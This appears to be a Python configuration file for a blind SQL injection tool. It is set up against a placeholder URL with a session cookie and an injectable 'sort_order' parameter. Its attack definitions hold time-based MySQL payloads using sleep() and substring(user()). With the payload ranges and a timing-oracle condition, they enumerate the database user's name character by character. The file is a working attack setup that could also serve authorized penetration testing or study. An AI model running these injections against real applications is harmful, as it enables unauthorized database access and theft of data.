#
# WARNING! See the README before editing this file.
#
# 1. logging verbosity for the tool's output
# DEBUG > INFO > WARN
LOGLEVEL = 'INFO'

# 2. static HTTP request configuration
# mark the injectable position with `*` in any of the following elements
# target application URL
URL = 'https://vulnerable.application.com/path/to/file'
# query string parameters (the `*` marks the position in `sort_order`)
PARAMS = 'action=get_paginated_results&page=0&rows=10&sort_by=&sort_order=asc*&time_span=1hour'
# request body parameters (none in this example)
DATA = None
# HTTP headers sent with every request
# NOTE: the Cookie value is a session credential; treat this file as a secret
# and keep real tokens out of version control
HEADERS = {
    'Cookie': 'SESSIONID=NjeThXV3lQdGdXL1pVSGFabDE0cTc0dHNjRmN',
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:59.0) Gecko/20100101 Firefox/59.0',
}

# 3. attack definitions, keyed by an integer id
# `{#}` marks an insertion point; `#` is the index into PAYLOADS
ATTACKS = {
    0: {
        # short human-readable summary of the entry
        'description': 'enumerate the database user length',
        # template with one insertion point ({0})
        'injection': ',(select+sleep(1)+from+dual+where+char_length((select+user()))%3d(select+0x{0}))',
    },
    1: {
        'description': 'enumerate the database user',
        # template with two insertion points ({0} and {1})
        'injection': ',(select+sleep(1)+from+dual+where+substring((select+user()),{0},1)%3d(select+0x{1}))',
    },
}

# 4. id of the ATTACKS entry to run
ATTACK = 1

# 5. payload sequences, one per insertion point of the chosen attack
# element k of this tuple feeds insertion point {k}
PAYLOADS = (
    # {0}: candidate positions 1..45
    range(1, 46),
    # {1}: candidate characters as two-digit ASCII hex (no quotes needed);
    # ordered roughly by English letter frequency, then digits, then punctuation
    ["{:x}".format(ord(c)) for c in 'etaoinshrdlucmfwgypbvkxjqz0123456789!"#$%&\'()*+,-./:;?@[\\]^_`{|}~'],
)
# 6. define a condition to return a boolean value
# override only the logic, and not the function declaration
def condition(payload, resp, i):
    # True when the response is considered a "hit"
    # in this example: the request took longer than 2 seconds (timing-based check);
    # `payload` and `i` are part of the fixed signature and unused here
    threshold_ms = 2000
    elapsed_ms = resp.elapsed.total_seconds() * 1000
    return elapsed_ms > threshold_ms
# 7. define an action for when the condition is true
# override only the logic, and not the function declaration
# must return a character of type `str`
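def success(payload, resp, i):
    # returns the value to display for a successful probe, always as `str`
    # the last payload element is the one being tested:
    #   - an ASCII-hex string (character enumeration) is decoded to the character
    #   - anything else (e.g. an int from a range, for length enumeration) is
    #     rendered with str()
    # `resp` and `i` are part of the fixed signature and unused here
    value = payload[-1]
    # isinstance (not `type(...) is str`) so str subclasses take the decode path too
    if isinstance(value, str):
        from binascii import unhexlify
        # raises binascii.Error on odd-length or non-hex input, as before
        return unhexlify(value).decode('ascii')
    return str(value)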